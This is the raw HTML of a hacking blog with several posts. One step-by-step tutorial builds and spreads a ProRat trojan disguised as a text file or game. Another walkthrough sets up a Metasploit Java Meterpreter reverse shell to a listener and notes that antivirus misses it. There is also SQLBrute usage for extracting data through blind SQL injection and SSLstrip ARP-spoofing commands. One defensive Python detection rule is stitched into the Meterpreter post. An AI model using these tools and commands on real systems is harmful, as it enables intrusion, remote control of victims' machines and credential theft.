connect through, the password you will be asked to enter when the victim
is infected and you wish to connect with them, and the victim name. As
you can see ProRat has the ability to disable the windows firewall and
hide itself from being displayed in the task manager. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtsX47M0kO97wbumJmiIc7tt9cLHrEvC2pfywCAx6Mad1cZv2bTIoAHvickLhjSKet5m4tvd_5uhavctUujohi-J_wZ5nrwW65rW4ycyNI_Z3oVQzLJg1J9ShE1MbOfdvNOXrlqTdj9tQ/s1600/3.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtsX47M0kO97wbumJmiIc7tt9cLHrEvC2pfywCAx6Mad1cZv2bTIoAHvickLhjSKet5m4tvd_5uhavctUujohi-J_wZ5nrwW65rW4ycyNI_Z3oVQzLJg1J9ShE1MbOfdvNOXrlqTdj9tQ/s320/3.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
6. Click on the <b>Bind with File </b>button
to continue. Here you will have the option to bind the trojan server
file with another file. Remember a trojan can only be executed if a
human runs it. So by binding it with a legitimate file like a text
document or a game, the chances of someone clicking it go up. Check the
bind option and select a file to bind it to. In the example I will use
an ordinary text document. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9I4WtC0Kw8u276XQg7dZ3LaYx5iOhMRMWS6ySYMaOOPohdgfKZhhg-uf_t4QlYyFUfNnFfnwrMUelGjv98FhuI63fmLIdxnt3Nu7bHjhdBQWCsvPq8Npl_5VssY0m_7h7azumbkDgSMI/s1600/4.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9I4WtC0Kw8u276XQg7dZ3LaYx5iOhMRMWS6ySYMaOOPohdgfKZhhg-uf_t4QlYyFUfNnFfnwrMUelGjv98FhuI63fmLIdxnt3Nu7bHjhdBQWCsvPq8Npl_5VssY0m_7h7azumbkDgSMI/s320/4.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcezGIqCr1v-D4uhrKk3lpCbcZuio3oalcT2c2DPyZ5PMs7j4RFGXMpG4-Abhmojgt6dE64K7_UNzm8Uiu3OgFN55pqbkCwP9t4ee8jAIEeF8DIHGPDKMCmqyYJu_seF_okyx5bK-9jmM/s1600/5.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcezGIqCr1v-D4uhrKk3lpCbcZuio3oalcT2c2DPyZ5PMs7j4RFGXMpG4-Abhmojgt6dE64K7_UNzm8Uiu3OgFN55pqbkCwP9t4ee8jAIEeF8DIHGPDKMCmqyYJu_seF_okyx5bK-9jmM/s320/5.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
7. Click on the <b>Server Extensions </b>button
to continue. Here you choose what kind of server file to generate. I
will stick with the default because it has icon support, but exes look
suspicious so it would be smart to change it. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjPj2ylujk7IZT1e-IA9jz4_TSb3P7mm8pNHGji-m-i3nd56TI9PJAqEfJT-j3h00DO1Yu4clEX2pdjuczcVF4gxRnie1Bc3VW4PCkav1Mv-pU1Traxu04tZbRIbu5a7KuoBTx6aH-eI/s1600/7.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjPj2ylujk7IZT1e-IA9jz4_TSb3P7mm8pNHGji-m-i3nd56TI9PJAqEfJT-j3h00DO1Yu4clEX2pdjuczcVF4gxRnie1Bc3VW4PCkav1Mv-pU1Traxu04tZbRIbu5a7KuoBTx6aH-eI/s320/7.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
8.
Click on Server Icon to continue. Here you will choose an icon for
your server file to have. The icons help mask what the file actually
is. For my example I will choose the regular text document icon since
my file is a text document. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLEtzKm56wuQ-cff33NZ5DTShn3EYxhdOVhEjc8DUxMhOuMOFQBrcamp7xbPi3M1Qum0OB1jzWz6eukKvFQm-n0gKEEnIDXU51k55kaI1dqs6PQfgVBGR_YxktJtT0NxU-59GtBNz8fQ/s1600/8.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLEtzKm56wuQ-cff33NZ5DTShn3EYxhdOVhEjc8DUxMhOuMOFQBrcamp7xbPi3M1Qum0OB1jzWz6eukKvFQm-n0gKEEnIDXU51k55kaI1dqs6PQfgVBGR_YxktJtT0NxU-59GtBNz8fQ/s320/8.bmp" width="320" /></a></div>
<div class="Default">
<br /></div>
<div class="Default">
9. Finally click on Create Server to, you guessed it, create the server file. </div>
<div class="Default">
<br /></div>
<div class="Default">
10.
A hacker would probably rename it to something like “Funny Joke” and
send it as an attachment to some people. A hacker could also put it up
as a torrent pretending it is something else, like the latest game that
just came out so he could get people to download it. </div>
<div class="Default">
<br /></div>
<div class="Default">
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. </div>
<div class="Default">
<br /></div>
<div class="Default">
12.
I’m going to run the server on my own computer to show you what would
happen. Once I run it the trojan will be installed onto my computer in
the background. The hacker would then get a message telling him that I
was infected. He would then connect to my computer by typing in my IP
address, port and clicking Connect. He will be asked for the password
that he made when he created the server. Once he types it in, he will
be connected to my computer and have full control over it. </div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
15. Below is an image of my task bar after the hacker clicks on <b>Hide Start Button</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-IyKrhaMVoN8Vxh0QapVM7Z03t659jZhIrJqJzwwb_C7EvE3QnNjVMoxwWU7YtDMmVf1pJXe-AflIfoXCRePtjLgEQJ17HDvzXiUWx0yF1XT_mkRVesN6S456C4cm9QQI_qFROZvn2jw/s1600/11.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-IyKrhaMVoN8Vxh0QapVM7Z03t659jZhIrJqJzwwb_C7EvE3QnNjVMoxwWU7YtDMmVf1pJXe-AflIfoXCRePtjLgEQJ17HDvzXiUWx0yF1XT_mkRVesN6S456C4cm9QQI_qFROZvn2jw/s1600/11.bmp" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
16. Below is an image of what the hacker would see if he chose to take a screen shot of the victim's screen. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaKKeMdZlwOLClrl5NPpZnN9-eo7DuqJL2z8bPsNorr1nzZeV4NxSsmB3BJZv20ftf4cobabl_rgTSSvzAhyphenhyphenqTrF9Rz5D89pCswoCnDWpZQBm23nwqaOx8wX3CjDZcbrDxcMeOQiTF8a8/s1600/12.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaKKeMdZlwOLClrl5NPpZnN9-eo7DuqJL2z8bPsNorr1nzZeV4NxSsmB3BJZv20ftf4cobabl_rgTSSvzAhyphenhyphenqTrF9Rz5D89pCswoCnDWpZQBm23nwqaOx8wX3CjDZcbrDxcMeOQiTF8a8/s320/12.bmp" width="290" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;">As
the example above shows, a hacker can do anything from silly pranks to
serious damage to the victim. ProRat is a very well-known trojan, so if the
victim has an anti-virus program installed its signature will most likely be
recognised and the infection blocked. Many skilled hackers write their own
viruses and trojans, and such custom builds can easily bypass anti-virus programs.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">iii) Phishing-</span></b><span style="font-family: Calibri;"> Information about phishing is available everywhere; search Google and learn it.<br /><br />SECURITY OWNED IS NOT THE AUTHOR OF THIS POST.<br />THIS POST WAS CREATED BY <br />http://www.devilscafe.in<br />AUTHOR: MINHAL MENDHI<br />THIS POST IS COPYRIGHT PROTECTED<br />BY DEVILSCAFE.<br />FIND SOME COOL TRICKS AT </span><span style="font-family: Calibri;">http://www.devilscafe.in</span><br /><span style="font-family: Calibri;"><br /></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com750tag:blogger.com,1999:blog-3299468824600484367.post-48513463992936694592011-09-06T03:12:00.000-07:002011-09-06T03:12:03.828-07:00Metasploit JAVA meterpreter payload<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>If you haven’t noticed, the Metasploit Framework has had a Java Meterpreter payload for some time now.</b>
</span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>It supports all the commands supported by the PHP Meterpreter (as of
SVN revision 9777), plus the ipconfig, route and screenshot
commands.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>It is not fully integrated into the framework yet, and some manual tweaking is needed to get it up and running.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>In this post I will show how to set it up and use it.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Furthermore, I have rewritten my “Evil java applet wizard” to automate the process of getting it up and running.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The script now supports a <strong>full Java attack</strong>, which includes the client-side applet attack and uses the Java Meterpreter payload instead of a binary executable.</b></span></div>
<div class="info_box" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Registered members can download the script at the end of this post (Script updated Aug 17) .</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Why use a Java Meterpreter, you ask?</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Well…you’ll see later…</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><span style="text-decoration: underline;">Requirements:</span></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>JRE 1.2 on the victim machine is enough, although some features, such as
routing tables or screenshots, require JRE 1.3, 1.4 or 1.6.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>You can find the java meterpreter payload jar file in:</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>"/pentest/exploits/framework3/data/java/loader.jar"</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>You will also need the “JavaMeterpreter.zip” file which you can download from <a href="https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip" target="_blank">HERE</a></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>I have just noticed that manual
tweaking is no longer necessary: the Metasploit Framework now has the
Java Meterpreter listener built in.</strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>That means you can skip steps 1 to 4 </strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>and instead of using the patched php meterpreter you can use the java meterpreter directly.</strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>I have also updated the script to use the java payload as well.</strong></b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > <strong>set PAYLOAD java/meterpreter/reverse_tcp</strong>
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Let’s see how to set it up manually...</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>1. Download</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>2. Unzip</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp# unzip JavaMeterpreter.zip</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>3. Copy necessary files</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>4. Back up the PHP Meterpreter files and rename the jar files to the .php extension (<strong>this will break PHP Meterpreter support</strong>)</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>5. Launch msfconsole and set up a multi/handler listener with the "php/meterpreter/reverse_tcp" payload.</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to the victim PC and run it as follows</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>7. Get your Meterpreter JAVA Shell…</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010
meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>P.S:</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The Java Meterpreter works on Linux systems as well.</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010
meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The reasons for that are:</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>1. Antivirus software does not detect the Java Meterpreter jar as a malicious file, at least at the time of writing (as you can see in the demo video below).</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>2. It makes sense to use the Java Meterpreter payload if you are already using the Java applet client-side attack vector.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>If the applet attack worked, the victim has Java installed, which is exactly what this payload needs.</b></span></div>
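<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Point 1 above is exactly why defenders hunt this payload on the endpoint instead of relying on file signatures: the jar is started by a perfectly legitimate java.exe, but the shape of the invocation (a jar in a user-writable location followed by a bare IP address and port, as in the <code>java -jar loader.jar 192.168.1.104 4444</code> line above) is unusual. The following is an added example, not code from this post or from Metasploit. It scans constructed process-creation records (pid, user, command line) and scores Java launches that look like a reverse-connecting stager; the sample lines, host names, addresses and scoring weights are invented for the example.</b></span></div>

```python
import ipaddress
import re
import shlex

# Constructed sample telemetry: one process per line, "<pid> <user> <command line>".
# The first line mirrors the loader.jar invocation from the post; the others are
# benign look-alikes plus one more suspicious launch, all made up for this example.
SAMPLE_PROCESSES = """\
1204 NightRanger java -jar loader.jar 192.168.1.104 4444
1310 NightRanger "C:\\Program Files\\Java\\jre6\\bin\\javaw.exe" -jar C:\\Temp\\update.jar 10.0.0.5 8443
2001 SYSTEM javaw.exe -Xmx512m -jar C:\\Apps\\build\\jenkins-cli.jar -s http://ci.corp.example/
2450 alice java -jar C:\\Users\\alice\\tools\\wordcount.jar input.txt
2777 bob python backup.py 192.168.1.104 4444
3102 carol java -jar C:\\Users\\carol\\Downloads\\player.jar 198.51.100.7 443
"""

_JAVA_EXE = re.compile(r"^(?:.*[\\/])?javaw?(?:\.exe)?$", re.IGNORECASE)
# A bare file name, or anything under a temp/user/download directory.
_USER_WRITABLE = re.compile(r"^[^\\/]+$|[\\/](?:temp|tmp|users|downloads)[\\/]", re.IGNORECASE)
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
METASPLOIT_DEFAULT_PORT = 4444  # the LPORT default shown in the handler output above


def _is_ipv4(token):
    try:
        return ipaddress.ip_address(token).version == 4
    except ValueError:
        return False


def split_cmdline(cmdline):
    """Tokenise a Windows or Unix command line, dropping surrounding quotes."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def analyse_process(record):
    """Return a finding dict for a stager-like Java launch, else None."""
    pid, user, cmdline = record.split(None, 2)
    args = split_cmdline(cmdline)
    if not args or not _JAVA_EXE.match(args[0]) or "-jar" not in args:
        return None
    jar_idx = args.index("-jar") + 1
    if jar_idx >= len(args):
        return None
    jar, tail = args[jar_idx], args[jar_idx + 1:]

    # loader.jar is started as "loader.jar <host> <port>": look for that pair.
    host = port = None
    for i in range(len(tail) - 1):
        if _is_ipv4(tail[i]) and tail[i + 1].isdigit():
            host, port = tail[i], int(tail[i + 1])
            break
    if host is None:
        return None

    reasons = ["jar launched with <ip> <port> arguments"]
    if port == METASPLOIT_DEFAULT_PORT:
        reasons.append("port 4444 is the Metasploit multi/handler default")
    if not any(ipaddress.ip_address(host) in net for net in _RFC1918):
        reasons.append("connects out to a non-RFC1918 address")
    if _USER_WRITABLE.search(jar):
        reasons.append("jar lives in a user-writable location")
    return {"pid": int(pid), "user": user, "jar": jar, "host": host,
            "port": port, "score": len(reasons), "reasons": reasons}


def hunt(telemetry):
    """Run the rule over every record; findings come back sorted by descending score."""
    findings = [f for f in (analyse_process(line) for line in telemetry.splitlines() if line.strip()) if f]
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in hunt(SAMPLE_PROCESSES):
        print(f"pid {f['pid']:>5} {f['user']:<12} score={f['score']} {f['jar']} -> {f['host']}:{f['port']}")
        for reason in f["reasons"]:
            print("      -", reason)
```

<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>In a real deployment the records would come from Sysmon process-creation events or an EDR, and the rule is only a first filter: the 2001 line shows why it must not fire on every java -jar, and a real stager can just as easily be wrapped in a batch file or fed a hostname instead of an IP, which is why the score is meant to rank, not to block.</b></span></div>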
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com5tag:blogger.com,1999:blog-3299468824600484367.post-18462961960600434242011-09-04T22:21:00.000-07:002011-09-04T22:21:18.212-07:00SQLbrute<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="color: #666666;">
<span class="mw-headline"> Description </span></h2>
<span style="color: #666666;">
</span><div style="color: #666666;">
<b>SQLBrute</b> is a tool for brute forcing data out of databases
using blind SQL injection vulnerabilities. It supports time based and
error based exploit types on Microsoft SQL Server, and error based
exploit on Oracle. It is written in Python, uses multi-threading, and
doesn’t require non-standard libraries (there is some code in there for
pycurl, but it is disabled because it isn’t finished).
</div>
<pre style="color: #666666;">
Usage: ./sqlbrute.py options url
[--help|-h]
[--verbose|-v]
[--server|-d oracle|sqlserver]
[--error|-e regex]
[--threads|-s number]
[--cookie|-k string]
[--time|-n]
[--data|-p string]
[--database|-f database]
[--table|-t table]
[--column|-c column]
[--where|-w column=data]
[--header|-x header::val]
--data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
--cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
--header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar).
The header name and value need to be supplied as a single argument of the form header::value
Other options modify the default behaviour of the tool:
--server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool
defaults to SQL Server, and won't intelligently detect that Oracle is in use
--threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however
this should be reduced if you are getting unreliable results (especially when doing time based testing).
Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
--time forces the tool to use time based testing instead of error based testing
--verbose turns on verbose output. By default the tool doesn't output anything until it has completely
enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose
once will output preliminary results - allowing you to see that its working. Using verbose twice will output
requests and responses to allow debug issues with the tool
--output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout
The remainder of the options specify the data to be brute forced from the database:
--error specifies a regular expression to look for that appears in one of the AND or OR cases noted above.
Usually this will be something identifiable such as an error message, or a message noting that no results were found
--database (SQL Server only) specifies what database to use for enumerating data
--table specifies what table to use for enumerating data
--column specifies what column to use for enumerating data
--where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column.
The where data must be in the form column_name=data (i.e. WHERE foo=bar)
The tool is designed to be used in a logical progression:
Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for
SQL Server, and the list of user tables for Oracle
Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data
in that column of that parameter. You can then find matching values in other columns of the table through
using a --where command line option
</pre>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com3tag:blogger.com,1999:blog-3299468824600484367.post-69855808035037755862011-09-04T08:34:00.000-07:002011-09-04T08:34:12.352-07:00SSLstrip Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; color: #666666; font-family: Arial,Helvetica,sans-serif; text-align: center;">
<span style="font-size: small;"><b><a href="http://3.bp.blogspot.com/_p3XIipv981Y/S88RVdmcG1I/AAAAAAAAAEA/g3d5W2XJFFs/s1600/MITM.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/_p3XIipv981Y/S88RVdmcG1I/AAAAAAAAAEA/g3d5W2XJFFs/s320/MITM.jpg" width="320" /></a></b></span></div>
<span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><br style="color: #666666;" /><span style="color: #666666;">
SSLstrip was released by Moxie Marlinspike to demonstrate the attack he presented at Black Hat DC 2009.
In this video we look at how to get started with SSLstrip. We set up
two VMware machines, one running Windows XP (victim) and the other
BackTrack 3 (attacker). Before we can strip anything, we need the
man-in-the-middle position and the packet redirection / forwarding
mechanism in place, which we do with the following commands in sequence:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
1. Setting up IP Forwarding:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
echo 1 > /proc/sys/net/ipv4/ip_forward</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
2. ARP MITM attack between Victim and Gateway:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1 </span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
3. Setting up port redirection using Iptables:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
4. Start SSLstrip and make it listen on port 10000 (the default anyway):</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
python sslstrip.py -w secret </span><br style="color: #666666;" /><span style="color: #666666;">
